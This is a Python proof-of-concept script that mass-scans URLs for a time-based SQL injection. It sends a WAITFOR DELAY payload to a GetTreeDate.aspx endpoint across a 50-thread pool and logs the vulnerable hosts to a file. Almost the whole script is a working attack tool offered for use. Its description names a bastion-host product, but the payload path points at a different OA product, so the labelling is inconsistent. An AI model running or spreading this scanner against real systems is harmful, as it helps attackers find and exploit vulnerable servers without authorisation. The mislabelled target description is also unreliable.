import requests,argparse,sys
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    banner ="""   _____                      _  ___      _         ______         _                             _                     __ _   
  / ____|                    | |/ (_)    (_)       |  ____|       | |                           (_)                   / _| |  
 | |     ___  ___  ___ ___   | ' / _ _ __ _ _ __   | |__ ___  _ __| |_ _ __ ___  ___ ___    __ _ _ _ __ ___ _ __ __ _| |_| |_ 
 | |    / _ \/ __|/ __/ _ \  |  < | | '__| | '_ \  |  __/ _ \| '__| __| '__/ _ \/ __/ __|  / _` | | '__/ __| '__/ _` |  _| __|
 | |___| (_) \__ \ (_| (_) | | . \| | |  | | | | | | | | (_) | |  | |_| | |  __/\__ \__ \ | (_| | | | | (__| | | (_| | | | |_ 
  \_____\___/|___/\___\___/  |_|\_\_|_|  |_|_| |_| |_|  \___/|_|   \__|_|  \___||___/___/  \__,_|_|_|  \___|_|  \__,_|_|  \__|
                                                                                                                              
                                                                                                                              

"""
    print(banner)

def main():
    banner()
    parser = argparse.ArgumentParser(description="中远麒麟堡垒机SQL注入漏洞")
    parser.add_argument('-u','--url',dest='url',type=str,help="Please input your URL")
    parser.add_argument('-f','--file',dest='file',type=str,help="Please input your File path")
    args = parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(50)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    payload = "/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1;WAITFOR+DELAY+%270:0:10%27+--%20and%201=1"
    payload2 = "/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1--%20and%201=1"
    try:
        res1 = requests.get(url=target+payload)
        res2 = requests.get(url=target+payload2)
        time1 = res1.elapsed.total_seconds()
        time2 = res2.elapsed.total_seconds()
        if time1-time2 >=9:
            print(f"[+]{target}存在延时注入漏洞")
            with open('result.txt','a',encoding='utf-8')as f:
                f.write(target+'\n')
        else:
            print(f"[-]{target}未发现延时注入漏洞")
    except:
        pass

if __name__ == '__main__':
    main()
